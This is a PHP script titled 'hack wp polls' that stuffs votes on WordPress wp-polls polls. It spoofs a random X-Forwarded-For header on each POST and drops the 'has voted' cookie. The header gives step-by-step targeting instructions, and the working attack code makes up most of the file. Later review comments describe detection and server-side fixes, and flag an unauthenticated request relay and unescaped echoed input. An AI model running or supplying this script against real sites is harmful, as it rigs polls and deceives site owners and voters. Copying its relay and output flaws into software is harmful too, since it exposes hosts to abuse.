hack wp polls
  1. <?php
  2. /**
  3.  * Copyright 2009; Dr Small
  4.  *
  5.  * A simple way to increase a specific number of votes on
  6.  * a wp-polls poll. It sets a new IP in the X-Forwarded-For
  7.  * header, every time it executes, dumps cookies to /tmp and
  8.  * doesn't read them the next time around.
  9.  *
  10.  * Howto use:
  11.  *      a) Find a Wordpress blog that uses a wp-polls poll
  12.  *      b) Use the URL as /wp-content/plugins/wp-polls/wp-polls.php
  13.  *      c) View the page source, and find `name="poll_id" value="52"`
  14.  *      d) Use the value as your poll_id
  15.  *      e) Find the value of the specific poll option you want to vote on (i.e, name="poll_52" value="548")
  16.  *      f) Specify how many votes go toward that option (with votes)
  17.  *
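  18.  * This same kind of method could be used on almost any kind of poll
  19.  * that does not use "user registration & activation" to vote, because
       * such polls tell voters apart only by values the client supplies
       * (here a request header and a cookie). The fix is server-side: take
       * the voter's address from the connection itself, honour
       * X-Forwarded-For only from proxies the site operates, and rate-limit
       * votes or tie them to authenticated accounts.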
  20.  **/
  21.  
  22. /**
  23.  * name:        Hack wp-polls
  24.  * @param:      url             string          The URL to the plugins/wp-polls/wp-polls.php file
  25.  * @param:      poll_id         int             The Poll ID
  26.  * @param:      poll_value      int             The option being voted on
  27.  * @param:      vote            int             How many times to vote on a given poll (default: 5)
  28.  * @param:      verbose         string          How verbose to be (default: true)
  29.  * @description:                                A proof of concept way to hack wp-polls.
  30.  **/
  31. function hack_wp_polls($url="/fr/wp-content/plugins/wp-polls/wp-polls.php", $poll_id=2, $poll_value=10, $vote=5, $verbose="false"){
              // Sends $vote POST requests to $url. Each request carries $poll_id and
              // $poll_value in the form body and a different random address in the
              // X-Forwarded-For header. With $verbose set to the string "true" a
              // step-by-step trace is echoed after every request.
              //
              // NOTE(review): the docblock above gives the default for $verbose as
              // true; the signature defaults it to the string "false".
              //
              // Defensive reading: this only has an effect on a poll that takes the
              // voter's address from a header the client controls. A server should use
              // the connection's peer address and honour X-Forwarded-For only when the
              // request arrived from a proxy it operates; per-peer rate limits or votes
              // tied to authenticated accounts are the usual hardening.
  32.  
  33.         // Generate a random four-octet (dotted-quad) address string.
              // The ranges are not filtered, so reserved, loopback and multicast
              // values are produced as well; such values in X-Forwarded-For cannot
              // belong to a real public client and are a cheap signal in access logs.
  34.         function makeUniqueIP(){
  35.                 srand((double)microtime()*1000000);
  36.                 $ip = rand(1,255).".".rand(0,255).".".rand(0,255).".".rand(1,255);
  37.                 return $ip;
  38.         }
  39.  
  40.         $i = 1;
  41.         while ($i <= $vote){
  42.                 $v .= "starting loop....<br />";
  43.  
  44.                 // Pick a new random address for this request (uniqueness is not checked)
  45.                 $ip = makeUniqueIP();
  46.                 $v .= "makeUniqueIP() returned $ip<br />";
  47.  
  48.                 // create a new cURL resource
  49.                 $ch = curl_init();
  50.                 $v .= "opening curl resource....<br />";
  51.  
  52.                 // Author's assumption: wp-polls blocks repeat votes by IP address
  53.                 // and reads that address from X-Forwarded-For, so a new header
  54.                 // value on each request is counted as a new voter.
                      // Detection: many votes arriving from one TCP peer address, each
                      // with a different X-Forwarded-For value.
  55.                 $headerarray = array(
  56.                         "X-Forwarded-For: $ip");
  57.  
  58.                 // The POST data to be sent
  59.                 $postfields = "vote=+++Vote+++&poll_id=$poll_id&poll_$poll_id=$poll_value";
  60.  
  61.                 // set URL and other appropriate options
  62.                 curl_setopt($ch, CURLOPT_URL, $url);
  63.                 $v .= "setting CURLOPT_URL to $url<br />";
  64.  
  65.                 curl_setopt($ch, CURLOPT_HEADER, 0);
                      // The User-Agent is a fixed string, so it shows up unchanged in the
                      // target's access log for every request this script sends.
  66.                 curl_setopt($ch, CURLOPT_USERAGENT, "cURL bot");
  67.                 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  68.                 curl_setopt($ch, CURLOPT_HTTPHEADER, $headerarray);
  69.                 curl_setopt($ch, CURLOPT_POST, true);
  70.                 $v .= "setting CURLOPT_POST to true<br />";
  71.  
  72.                 curl_setopt($ch, CURLOPT_POSTFIELDS, $postfields);
  73.                 $v .= "setting CURLOPT_POSTFIELDS to $postfields<br />";
  74.  
                      // Received cookies are saved to this file when the handle is released.
                      // No CURLOPT_COOKIEFILE is set, so they are never sent back: every
                      // request reaches the poll without a "has voted" cookie.
                      // NOTE(review): fixed, predictable file name in a shared directory.
  75.                 curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookiefile.txt');
  76.                 $v .= "setting CURLOPT_COOKIEJAR to /tmp/cookiefile.txt<br />";
  77.  
  78.                 curl_exec($ch);
  79.                 $v .= "executing curl...<br />";
  80.  
  81.                 // close cURL resource, and free up system resources
  82.                 curl_close($ch);
  83.                 $v .= "closing curl resource....<br /><br /><br />";
  84.  
  85.                 // Be verbose, if requested.
                      // NOTE(review): $v contains $url and $postfields exactly as they were
                      // passed in and is echoed without HTML escaping, so when the caller
                      // fills them from a request the output reflects that input as markup.
  86.                 if ($verbose == "true"){
  87.                         echo $v;
  88.                         $v = '';
  89.                 }
  90.                 $i++;
  91.         }
  92. }
  93.  
  94. if ($_POST[url] && $_POST[poll_id] && $_POST[option] && $_POST[verbose]){
              // Entry point: runs only when url, poll_id, option and verbose are all
              // present and truthy in the POST body; votes is passed on unchecked.
              // NOTE(review): nothing authenticates the caller or validates the URL.
              // On a reachable web server, anyone who can request this file can make
              // that server send POSTs to a destination they choose, so a copy found
              // on a host should be treated as an open request relay and removed.
  95.         hack_wp_polls($_POST[url], $_POST[poll_id], $_POST[option], $_POST[votes], $_POST[verbose]);
  96. }  
  97.  
  98. ?>